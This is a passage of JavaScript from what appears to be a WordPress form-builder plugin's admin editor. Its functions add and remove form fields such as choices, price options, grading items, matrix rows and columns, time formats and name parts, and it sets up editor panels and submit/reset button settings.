				td.setAttribute("id", num+"_td_little"+i);
				td.setAttribute("idi", i);
			
			var adding = document.createElement(element);
				adding.setAttribute("type", type);
				adding.setAttribute("value", document.getElementById("el_choices"+i).value);
				adding.setAttribute("id", num+"_elementform_id_temp"+i);
			
						if(type=='checkbox')
							{
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onclick", "if(set_checked('"+num+"','"+i+"','form_id_temp')) show_other_input('"+num+"','form_id_temp');");
								}
								else
									adding.setAttribute("onclick", "set_checked('"+num+"','"+i+"','form_id_temp')");
		
									adding.setAttribute("name", num+"_elementform_id_temp"+i);
							}
								
							if(type=='radio')
							{
							adding.setAttribute("name", num+"_elementform_id_temp");
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp'); show_other_input('"+num+"','form_id_temp')");	
								}
								else
								adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp')");
							}
			
			
			var label_adding = document.createElement('label');
				label_adding.setAttribute("id", num+"_label_element"+i);
				label_adding.setAttribute("class", "ch_rad_label");
				label_adding.setAttribute("for",num+"_elementform_id_temp"+i);
				label_adding.innerHTML=document.getElementById("el_choices"+i).value;
				
				td.appendChild(adding);
				td.appendChild(label_adding);
				tr0.appendChild(td);
				table.appendChild(tr0);
		}
		    }
		}
}
}

function remove_choise(id, num, type) {
  var choices_td= document.getElementById('choices');
  var el_choices = document.getElementById('el_choices'+id);
  var el_choices_remove = document.getElementById('el_choices'+id+'_remove');
  var br = document.getElementById('br'+id);
  choices_td.removeChild(el_choices);
  choices_td.removeChild(el_choices_remove);
  choices_td.removeChild(br);
  refresh_rowcol(num, type);
  refresh_id_name(num, document.getElementById(num+'_typeform_id_temp').value );
}

function remove_choise_price(id, num) {
  var q = 0;
  if (document.getElementById(num + '_hor')) {
    q = 1;
    flow_ver(num);
  }
  j++;
  var table = document.getElementById(num + '_table_little');
  var tr = document.getElementById(num + '_element_tr' + id);
  table.removeChild(tr);
  var choices_td= document.getElementById('choices');
  var el_choices = document.getElementById('el_choices'+id);
  var el_choices_price = document.getElementById('el_option_price'+id);
  var el_choices_remove = document.getElementById('el_choices'+id+'_remove');
  var br = document.getElementById('br'+id);
  choices_td.removeChild(el_choices);
  choices_td.removeChild(el_choices_price);
  choices_td.removeChild(el_choices_remove);
  choices_td.removeChild(br);
  if (q == 1) {
    flow_hor(num);
  }
  refresh_id_name(num, document.getElementById(num+'_typeform_id_temp').value);
}

function remove_option_price(id, num) {
  var select_ = document.getElementById(num + '_elementform_id_temp');
  var option = document.getElementById(num + '_option' + id);
  select_.removeChild(option);
  var choices_td= document.getElementById('choices');
  var el_choices = document.getElementById('el_option' + id);
  var el_choices_price = document.getElementById('el_option_price' + id);
  var el_choices_dis = document.getElementById('el_option' + id + '_dis');
  var el_choices_remove = document.getElementById('el_option' + id + '_remove');
  var br = document.getElementById('br' + id);
  choices_td.removeChild(el_choices);
  choices_td.removeChild(el_choices_price);
  choices_td.removeChild(el_choices_dis);
  choices_td.removeChild(el_choices_remove);
  choices_td.removeChild(br);
}

function add_grading_items(num){
	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_items"+i))
		 {
			break;
		 }
	}	

	 m=i+1;
  
	var choices_td= document.getElementById("items");
	
		var br = document.createElement('br');
		br.setAttribute("id", "britems"+m);
		var el_choices = document.createElement('input');
		el_choices.setAttribute("id", "el_items"+m);
		el_choices.setAttribute("type", "text");
		el_choices.setAttribute("value", "");
		el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
		el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_elementform_id_temp"+m+"', this.value); change_in_value('"+num+"_label_elementform_id_temp"+m+"', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_items"+m+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_grading_items('"+m+"','"+num+"')");
	
	    choices_td.appendChild(br);
	    choices_td.appendChild(el_choices);
	    choices_td.appendChild(el_choices_remove);
	
	
refresh_grading_items(num);
refresh_id_name(num, 'type_grading');

}

function sum_grading_values(a,b){} 

function refresh_grading_items(num){

	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_items"+i))
		 {
			break;
		 }
	}	
	 m=i;

	
var div = document.getElementById(num+'_elementform_id_temp');
	div.innerHTML='';
    

for(i=0;i<=m;i++)
{

	if(document.getElementById("el_items"+i))
	{
	
		var div_grading = document.createElement('div');
			div_grading.setAttribute("id", num+"_element_div"+i);
			div_grading.setAttribute("class", "grading");
	
		
		var input_item = document.createElement('input');
				input_item.setAttribute("id", num+"_elementform_id_temp"+i);
				input_item.setAttribute("name", num+"_elementform_id_temp"+i);
				input_item.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
				input_item.setAttribute("value", "");					
                input_item.setAttribute("size", "5");					
				input_item.setAttribute("onKeyUp", "sum_grading_values("+num+",'form_id_temp')");
				input_item.setAttribute("onChange", "sum_grading_values("+num+",'form_id_temp')");
				
		var label_item = document.createElement('label');
				label_item.setAttribute("id", num+"_label_elementform_id_temp"+i);
				label_item.setAttribute("class", "ch_rad_label");
				//label_item.setAttribute("for",num+"_elementform_id_temp"+i);	
				label_item.innerHTML = document.getElementById("el_items"+i).value;	
	  

		div_grading.appendChild(input_item);	
		div_grading.appendChild(label_item);
		div.appendChild(div_grading);
		
	}   
	
}
        var div_total = document.createElement('div');
			div_total.setAttribute("id", num+"_element_total_divform_id_temp");
			div_total.setAttribute("class", "grading_div");
		var Total = document.createTextNode("Total:");	
		var Seperator = document.createTextNode("/");	
		
		var span_total = document.createElement('span');
			span_total.setAttribute("id", num+"_total_elementform_id_temp");
			span_total.setAttribute("name", num+"_total_elementform_id_temp");
			span_total.innerHTML = document.getElementById(num+'_grading_totalform_id_temp').value;
		
		var span_gum = document.createElement('span');
			span_gum.setAttribute("id", num+"_sum_elementform_id_temp");	
			span_gum.setAttribute("name", num+"_sum_elementform_id_temp");	
			span_gum.innerHTML = 0;
 		 
		var span_of_text = document.createElement('span');
			span_of_text.setAttribute("id", num+"_text_elementform_id_temp");	
			span_of_text.setAttribute("name", num+"_text_elementform_id_temp");	
			span_of_text.innerHTML = "";
		 
	    div_total.appendChild(Total);
		div_total.appendChild(span_gum);
		div_total.appendChild(Seperator);
		div_total.appendChild(span_total);
		div_total.appendChild(span_of_text);
        div.appendChild(div_total);
                   
}

function remove_grading_items(id, num){
		var choices_td= document.getElementById("items");
		
		var el_choices = document.getElementById('el_items'+id);
		var el_choices_remove = document.getElementById('el_items'+id+'_remove');
		var br = document.getElementById('britems'+id);
		
		choices_td.removeChild(el_choices);
		choices_td.removeChild(el_choices_remove);
		choices_td.removeChild(br);

refresh_grading_items(num);
refresh_id_name(num, 'type_grading');
}




function add_to_matrix(type, num){
	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_rows"+i))
		 {
			break;
		 }
	}	
if(type=="rows")
{
	 m=i+1;
} 
else
	 m=i;

	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_columns"+i))
		 {
			break;
		 }
	}	
if(type=="columns")
{
	 n=i+1;
} 
else
n=i;
	
	 
 
	var choices_td= document.getElementById(type);
	if(type=="rows")
	{
		var br = document.createElement('br');
		br.setAttribute("id", "br"+type+m);
		var el_choices = document.createElement('input');
		el_choices.setAttribute("id", "el_"+type+m);
		el_choices.setAttribute("type", "text");
		el_choices.setAttribute("value", "");
		el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
		el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_elementform_id_temp"+m+"_0', this.value); change_in_value('"+num+"_label_elementform_id_temp"+m+"_0', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_"+type+m+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_rowcols('"+m+"','"+num+"','"+type+"')");
	
	    choices_td.appendChild(br);
	    choices_td.appendChild(el_choices);
	    choices_td.appendChild(el_choices_remove);
	}
	else
	{
		var br = document.createElement('br');
			br.setAttribute("id", "br"+type+n);
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_"+type+n);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", "");
			el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_elementform_id_temp"+"0_"+n+"', this.value); change_in_value('"+num+"_label_elementform_id_temp"+"0_"+n+"', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_"+type+n+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_rowcols('"+n+"','"+num+"','"+type+"')");
	
			choices_td.appendChild(br);
			choices_td.appendChild(el_choices);
			choices_td.appendChild(el_choices_remove);

	}	
refresh_matrix(num);


}


function refresh_matrix(num){

	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_rows"+i))
		 {
			break;
		 }
	}	
	 m=i;

	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_columns"+i))
		 {
			break;
		 }
	}	
	n=i;
	
	



var table = document.getElementById(num+'_table_little');
	table.innerHTML='';

	
		var tr0 = document.createElement('tr');
			tr0.setAttribute("id", num+"_element_tr0");
		
		table.appendChild(tr0);
		
		var td0 = document.createElement('td');
			td0.setAttribute("id", num+"_element_td0_0");		
			td0.innerHTML="";		
		tr0.appendChild(td0);


		for(k=1;k<=n;k++)
		{
			if(document.getElementById("el_columns"+k))
			{
			
				var td = document.createElement('td');
					td.setAttribute("id", num+"_element_td0_"+k);	
					td.setAttribute("class", "matrix_");

					
				var label_column = document.createElement('label');
						label_column.setAttribute("id", num+"_label_elementform_id_temp"+"0_"+k);
						label_column.setAttribute("name", num+"_label_elementform_id_temp"+"0_"+k);
						label_column.setAttribute("class", "ch_rad_label");
						label_column.setAttribute("for",num+"_elementform_id_temp"+k);	
						label_column.innerHTML=document.getElementById("el_columns"+k).value;	
                
			
						
						td.appendChild(label_column);
							
						tr0.appendChild(td);
						
						
			}
		}
		
                    

for(i=1;i<=m;i++)
{

	if(document.getElementById("el_rows"+i))
	{
		var tr = document.createElement('tr');
			tr.setAttribute("id", num+"_element_tr"+i);
		var td0 = document.createElement('td');
			td0.setAttribute("id", num+"_element_td"+i+"_0");		
			td0.setAttribute("class", "matrix_");	
			
		var label_row = document.createElement('label');
				label_row.setAttribute("id", num+"_label_elementform_id_temp"+i+"_0");
				label_row.setAttribute("class", "ch_rad_label");
				label_row.setAttribute("for",num+"_elementform_id_temp"+i);	
				label_row.innerHTML=document.getElementById("el_rows"+i).value;	
		
       

		
		td0.appendChild(label_row);	
		tr.appendChild(td0);
		
		table.appendChild(tr);
		
		for(k=1;k<=n;k++)
		{
			if(document.getElementById("el_columns"+k))
			{
				
				var td = document.createElement('td');
					td.setAttribute("id", num+"_element_td"+i+"_"+k);	
					td.style.cssText =   "text-align:center";

										
					

							
		if(document.getElementById("edit_for_select_input_type").value=="select"){
					var select_yes_no = document.createElement('select');
					    select_yes_no.setAttribute("id", num+"_select_yes_noform_id_temp"+i+"_"+k);
						select_yes_no.setAttribute("name", num+"_select_yes_noform_id_temp"+i+"_"+k);
					var option_yes_no1 = document.createElement('option');
						option_yes_no1.setAttribute("value", "");
                    Nothing = document.createTextNode(" ");
					
					var option_yes_no2 = document.createElement('option');
						option_yes_no2.setAttribute("value", "yes");
                    Yes = document.createTextNode("Yes");
					
					var option_yes_no3 = document.createElement('option');
						option_yes_no3.setAttribute("value", "no");
                    No = document.createTextNode("No");
                
				        option_yes_no1.appendChild(Nothing);
					    option_yes_no2.appendChild(Yes);
					    option_yes_no3.appendChild(No);
                        select_yes_no.appendChild(option_yes_no1);
					    select_yes_no.appendChild(option_yes_no2);
					    select_yes_no.appendChild(option_yes_no3);
					    td.appendChild(select_yes_no);
					}			
					else{		
					var input_of_matrix = document.createElement('input');
							input_of_matrix.setAttribute("id", num+"_input_elementform_id_temp"+i+"_"+k);
							input_of_matrix.setAttribute("align", "center"); 
							input_of_matrix.setAttribute("size", "14"); 							
							
							input_of_matrix.setAttribute("type", document.getElementById("edit_for_select_input_type").value);	
									
						
                    if(document.getElementById("edit_for_select_input_type").value=="radio"){
					   input_of_matrix.setAttribute("name", num+"_input_elementform_id_temp"+i);
					   input_of_matrix.setAttribute("value", i+"_"+k);
					   }
					else {
					    if(document.getElementById("edit_for_select_input_type").value=="checkbox"){
                          input_of_matrix.setAttribute("name", num+"_input_elementform_id_temp"+i+"_"+k);
                          input_of_matrix.setAttribute("value", 1);
					    }
					    else{
					      input_of_matrix.setAttribute("name", num+"_input_elementform_id_temp"+i+"_"+k);
                          input_of_matrix.setAttribute("value", '');
					    }
					}
							td.appendChild(input_of_matrix);
							
							}
						
								
				tr.appendChild(td);
			}
		}
	}   
}
               
}

function remove_rowcols(id, num, type)
{
		var choices_td= document.getElementById(type);
		
		var el_choices = document.getElementById('el_'+type+id);
		var el_choices_remove = document.getElementById('el_'+type+id+'_remove');
		var br = document.getElementById('br'+type+id);
		
		choices_td.removeChild(el_choices);
		choices_td.removeChild(el_choices_remove);
		choices_td.removeChild(br);

refresh_matrix(num);
}

function remove_option(id, num) {
  var select_ = document.getElementById(num+'_elementform_id_temp');
  var option = document.getElementById(num+'_option'+id);
  select_.removeChild(option);
  var choices_td= document.getElementById('choices');
  var el_choices = document.getElementById('el_option'+id);
  var el_choices_dis = document.getElementById('el_option'+id+'_dis');
  var el_choices_remove = document.getElementById('el_option'+id+'_remove');
  var br = document.getElementById('br'+id);
  choices_td.removeChild(el_choices);
  choices_td.removeChild(el_choices_dis);
  choices_td.removeChild(el_choices_remove);
  choices_td.removeChild(br);
}

function getIFrameDocument(aID){ 
var rv = null; 
// if contentDocument exists, W3C compliant (Mozilla) 
if (document.getElementById(aID) && document.getElementById(aID).contentDocument){
rv = document.getElementById(aID).contentDocument; 
} else if (document.getElementById(aID)) {
// IE 
rv = document.frames[aID].document; 
} 
return rv; 
}

function delete_last_child() {
  if (document.getElementById("form_maker_editor_ifr")) {
    ifr_id = "form_maker_editor_ifr";
    ifr = getIFrameDocument(ifr_id);
    ifr.body.innerHTML = "";
  }
	document.getElementById('main_editor').style.display = "none";
	document.getElementById('form_maker_editor').value = "";
	if (document.getElementById('show_table').lastChild) {
		var del1 = document.getElementById('show_table').lastChild;
		var del2 = document.getElementById('edit_table').lastChild;
		var main1 = document.getElementById('show_table');
		var main2 = document.getElementById('edit_table');
		main1.removeChild(del1);
		main2.removeChild(del2);
	}
}

function format_12(num, am_or_pm, w_hh, w_mm, w_ss) {
  tr_time1 = document.getElementById(num+'_tr_time1')
  tr_time2 = document.getElementById(num+'_tr_time2')
  var td1 = document.createElement('td');
  td1.setAttribute("id", num+"_am_pm_select");
  td1.setAttribute("class", "td_am_pm_select");
  var td2 = document.createElement('td');
  td2.setAttribute("id", num+"_am_pm_label");
  td2.setAttribute("class", "td_am_pm_select");
  var am_pm_select = document.createElement('select');
  am_pm_select.setAttribute("class", "am_pm_select");
  am_pm_select.setAttribute("name",  num+"_am_pmform_id_temp");
  am_pm_select.setAttribute("id",  num+"_am_pmform_id_temp");
  am_pm_select.setAttribute("onchange", "set_sel_am_pm(this)");
  var am_option = document.createElement('option');
  am_option.setAttribute("value", "am");
  am_option.innerHTML = "AM";
  var pm_option = document.createElement('option');
  pm_option.setAttribute("value", "pm");
  pm_option.innerHTML = "PM";
  if (am_or_pm == "pm") {
    pm_option.setAttribute("selected", "selected");
  }
  else {
    am_option.setAttribute("selected", "selected");
  }
  var am_pm_label = document.createElement('label');
  am_pm_label.setAttribute("class", "mini_label");
  am_pm_label.setAttribute("id", num+"_mini_label_am_pm");
  am_pm_label.innerHTML=w_mini_labels[3];
  am_pm_select.appendChild(am_option);
  am_pm_select.appendChild(pm_option);
  td1.appendChild(am_pm_select);
  td2.appendChild(am_pm_label);
  tr_time1.appendChild(td1);
  tr_time2.appendChild(td2);
  document.getElementById(num+'_hhform_id_temp').setAttribute("onKeyPress", "return check_hour(event, '"+num+"_hhform_id_temp',"+"'12'"+")");
  document.getElementById(num+'_hhform_id_temp').value=w_hh;
  document.getElementById(num+'_mmform_id_temp').value=w_mm;
  if (document.getElementById(num + '_ssform_id_temp')) {
    document.getElementById(num+'_ssform_id_temp').value = w_ss;
  }
  refresh_attr(num, 'type_time');
  jQuery(document).ready(function() {
    jQuery("label#"+num+"_mini_label_am_pm").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var am_pm = "<input type='text' class='am_pm' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
        jQuery(this).html(am_pm);				
        jQuery("input.am_pm").focus();
        jQuery("input.am_pm").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+num+"_mini_label_am_pm").text(value);
        });
      }	
    });		
	});	
}

function format_24(num) {
  tr_time1 = document.getElementById(num+'_tr_time1')
  td1 = document.getElementById(num+'_am_pm_select')
  tr_time2 = document.getElementById(num+'_tr_time2')
  td2 = document.getElementById(num+'_am_pm_label')
  tr_time1.removeChild(td1);
  tr_time2.removeChild(td2);
  document.getElementById(num+'_hhform_id_temp').setAttribute("onKeyPress", "return check_hour(event, '"+num+"_hhform_id_temp', '23')");
  document.getElementById(num+'_hhform_id_temp').value="";
  document.getElementById(num+'_mmform_id_temp').value="";
  if (document.getElementById(num + '_ssform_id_temp')) {
    document.getElementById(num + '_ssform_id_temp').value = "";
  }
}

function format_extended(num) {
  w_size=document.getElementById(num+'_element_firstform_id_temp').style.width;
  tr_name1 = document.getElementById(num+'_tr_name1');
  tr_name2 = document.getElementById(num+'_tr_name2');
  var td_name_input1 = document.createElement('td');
  td_name_input1.setAttribute("id", num+"_td_name_input_title");
  var td_name_input4 = document.createElement('td');
  td_name_input4.setAttribute("id", num+"_td_name_input_middle");
  var td_name_label1 = document.createElement('td');
  td_name_label1.setAttribute("id", num+"_td_name_label_title");
  td_name_label1.setAttribute("align", "left");
  var td_name_label4 = document.createElement('td');
  td_name_label4.setAttribute("id", num+"_td_name_label_middle");
  td_name_label4.setAttribute("align", "left");
  var title = document.createElement('input');
  title.setAttribute("type", 'text');
  title.setAttribute("class", "input_deactive");
  title.style.cssText = "margin: 0px 10px 0px 0px; padding: 0px; width:40px";
  title.setAttribute("id", num+"_element_titleform_id_temp");
  title.setAttribute("name", num+"_element_titleform_id_temp");
  title.setAttribute("value", '');
  title.setAttribute("title", '');
  title.setAttribute("onFocus", 'delete_value("'+num+'_element_titleform_id_temp")');
  title.setAttribute("onBlur", 'return_value("'+num+'_element_titleform_id_temp")');
  title.setAttribute("onChange", "change_value('"+num+"_element_titleform_id_temp')");
  var title_label = document.createElement('label');
  title_label.setAttribute("class", "mini_label");
  title_label.setAttribute("id", num+"_mini_label_title");
  title_label.innerHTML= w_mini_labels[0];
  var middle = document.createElement('input');
  middle.setAttribute("type", 'text');
  middle.setAttribute("class", "input_deactive");
  middle.style.cssText = "padding: 0px; width:"+w_size;
  middle.setAttribute("id", num+"_element_middleform_id_temp");
  middle.setAttribute("name", num+"_element_middleform_id_temp");
  middle.setAttribute("value", '');
  middle.setAttribute("title", '');
  middle.setAttribute("onFocus", 'delete_value("'+num+'_element_middleform_id_temp")');
  middle.setAttribute("onBlur", 'return_value("'+num+'_element_middleform_id_temp")');
  middle.setAttribute("onChange", "change_value('"+num+"_element_middleform_id_temp')");
  var middle_label = document.createElement('label');
  middle_label.setAttribute("class", "mini_label");
  middle_label.setAttribute("id", num+"_mini_label_middle");
  middle_label.innerHTML=w_mini_labels[3];
  first_input = document.getElementById(num+'_td_name_input_first');
  last_input = document.getElementById(num+'_td_name_input_last');
  first_label = document.getElementById(num+'_td_name_label_first');
  last_label = document.getElementById(num+'_td_name_label_last');
  td_name_input1.appendChild(title);
  td_name_input4.appendChild(middle);
  tr_name1.insertBefore(td_name_input1, first_input);
  tr_name1.insertBefore(td_name_input4, null);
  td_name_label1.appendChild(title_label);
  td_name_label4.appendChild(middle_label);
  tr_name2.insertBefore(td_name_label1, first_label);
  tr_name2.insertBefore(td_name_label4, null);
  var gic1 = document.createTextNode("-");
  var gic2 = document.createTextNode("-");
  var el_first_value_title = document.createElement('input');
  el_first_value_title.setAttribute("id", "el_first_value_title");
  el_first_value_title.setAttribute("type", "text");
  el_first_value_title.setAttribute("value", '');
  el_first_value_title.style.cssText = "width:50px; margin-left:4px; margin-right:4px";
  el_first_value_title.setAttribute("onKeyUp", "change_input_value(this.value,'"+num+"_element_titleform_id_temp')");
  var el_first_value_middle = document.createElement('input');
  el_first_value_middle.setAttribute("id", "el_first_value_middle");
  el_first_value_middle.setAttribute("type", "text");
  el_first_value_middle.setAttribute("value", '');
  el_first_value_middle.style.cssText = "width:100px; margin-left:4px";
  el_first_value_middle.setAttribute("onKeyUp", "change_input_value(this.value,'"+num+"_element_middleform_id_temp')");
  el_first_value_first = document.getElementById('el_first_value_first');
  parent=el_first_value_first.parentNode;
  parent.insertBefore(gic1, el_first_value_first);
  parent.insertBefore(el_first_value_title, gic1);
  parent.appendChild(gic2);
  parent.appendChild(el_first_value_middle);
  refresh_attr(num, 'type_name');
  jQuery(document).ready(function() {
    jQuery("label#"+num+"_mini_label_title").click(function() {
      if (jQuery(this).children('input').length == 0) {				
        var title = "<input type='text' class='title' size='10' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
        jQuery(this).html(title);				
        jQuery("input.title").focus();
        jQuery("input.title").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+num+"_mini_label_title").text(value);
        });
      }
    });
    jQuery("label#"+num+"_mini_label_middle").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var middle = "<input type='text' class='middle'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(middle);
        jQuery("input.middle").focus();
        jQuery("input.middle").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+num+"_mini_label_middle").text(value);
        });
      }
    });
	});
}

function format_normal(num) {
  tr_name1 = document.getElementById(num + '_tr_name1');
  tr_name2 = document.getElementById(num + '_tr_name2');
  td_name_input1 = document.getElementById(num + '_td_name_input_title');
  td_name_input4 = document.getElementById(num + '_td_name_input_middle');
  td_name_label1 = document.getElementById(num + '_td_name_label_title');
  td_name_label4 =document.getElementById(num + '_td_name_label_middle');		
  tr_name1.removeChild(td_name_input1);
  tr_name1.removeChild(td_name_input4);
  tr_name2.removeChild(td_name_label1);
  tr_name2.removeChild(td_name_label4);
  el_first_value_first = document.getElementById('el_first_value_first');
  parent = el_first_value_first.parentNode;
  parent.removeChild( document.getElementById('el_first_value_title').nextSibling);
  parent.removeChild( document.getElementById('el_first_value_title'));
  parent.removeChild( document.getElementById('el_first_value_middle').previousSibling);
  parent.removeChild( document.getElementById('el_first_value_middle'));
}

function type_section_break(i, w_editor) {
  var pos=document.getElementsByName("el_pos");
  pos[0].setAttribute("disabled", "disabled");
  pos[1].setAttribute("disabled", "disabled");
  pos[2].setAttribute("disabled", "disabled");
	var sel_el_pos=document.getElementById("sel_el_pos");
  sel_el_pos.setAttribute("disabled", "disabled");
  document.getElementById("element_type").value="type_section_break";
	delete_last_child();
  // Edit table.
	oElement = document.getElementById('table_editor');
	var iReturnTop = 0;
	var iReturnLeft = 0;
	while (oElement != null) {
    iReturnTop += oElement.offsetTop;
    iReturnLeft += oElement.offsetLeft;
    oElement = oElement.offsetParent;
  }
  document.getElementById('main_editor').style.display="block";
  document.getElementById('main_editor').style.left=iReturnLeft + 195 + "px";
  document.getElementById('main_editor').style.top=iReturnTop + 70 + "px";
  if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
    ifr_id = "form_maker_editor_ifr";
    ifr = getIFrameDocument(ifr_id);
    ifr.body.innerHTML = w_editor;
  }
  else {
    document.getElementById('form_maker_editor').value = w_editor;
  }
  element = 'div';
  var div = document.createElement('div');
  div.setAttribute("id", "main_div");
  var main_td = document.getElementById('show_table');
  main_td.appendChild(div);
  var div = document.createElement('div');
  div.style.width = "600px";
  document.getElementById('edit_table').appendChild(div);				
}

function type_editor(i, w_editor){

    document.getElementById("element_type").value="type_editor";
	delete_last_child();
// edit table	
	oElement=document.getElementById('table_editor');
	var iReturnTop = 0;
	var iReturnLeft = 0;
	while( oElement != null ) 
	{
	iReturnTop += oElement.offsetTop;
	iReturnLeft += oElement.offsetLeft;
	oElement = oElement.offsetParent;
	}
	
		document.getElementById('main_editor').style.display="block";
		document.getElementById('main_editor').style.left=iReturnLeft+195+"px";
		document.getElementById('main_editor').style.top=iReturnTop+70+"px";
		
		
		
		if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
      ifr_id = "form_maker_editor_ifr";
			ifr=getIFrameDocument(ifr_id);
			ifr.body.innerHTML=w_editor;
		}
		else {
			document.getElementById('form_maker_editor').value=w_editor;
		}
		
			element='div';
	
		
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");		
      	var main_td  = document.getElementById('show_table');
      	main_td.appendChild(div);
		
     	var div = document.createElement('div');
      	    div.style.width="600px";				
		document.getElementById('edit_table').appendChild(div);
		
		
}

function type_submit_reset(i, w_submit_title , w_reset_title , w_class, w_act, w_attr_name, w_attr_value){

    document.getElementById("element_type").value="type_submit_reset";
    
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var el_submit_title_label = document.createElement('label');
	                el_submit_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_submit_title_label.innerHTML = "Submit button label";
	
	var el_submit_title_textarea = document.createElement('input');
                el_submit_title_textarea.setAttribute("id", "edit_for_title");
                el_submit_title_textarea.setAttribute("type", "text");
                el_submit_title_textarea.style.cssText = "width:160px";
                el_submit_title_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_submitform_id_temp', this.value)");
		el_submit_title_textarea.value = w_submit_title;
	var el_submit_func_label = document.createElement('label');
	                el_submit_func_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_submit_func_label.innerHTML = "Submit function";
	var el_submit_func_textarea = document.createElement('input');
                el_submit_func_textarea.setAttribute("type", "text");
                el_submit_func_textarea.setAttribute("disabled", "disabled");
                el_submit_func_textarea.style.cssText = "width:160px";
		el_submit_func_textarea.value = "check_required('submit', 'form_id_temp')";

	var el_reset_title_label = document.createElement('label');
	                el_reset_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_reset_title_label.innerHTML = "Reset button label";
	
	var el_reset_title_textarea = document.createElement('input');
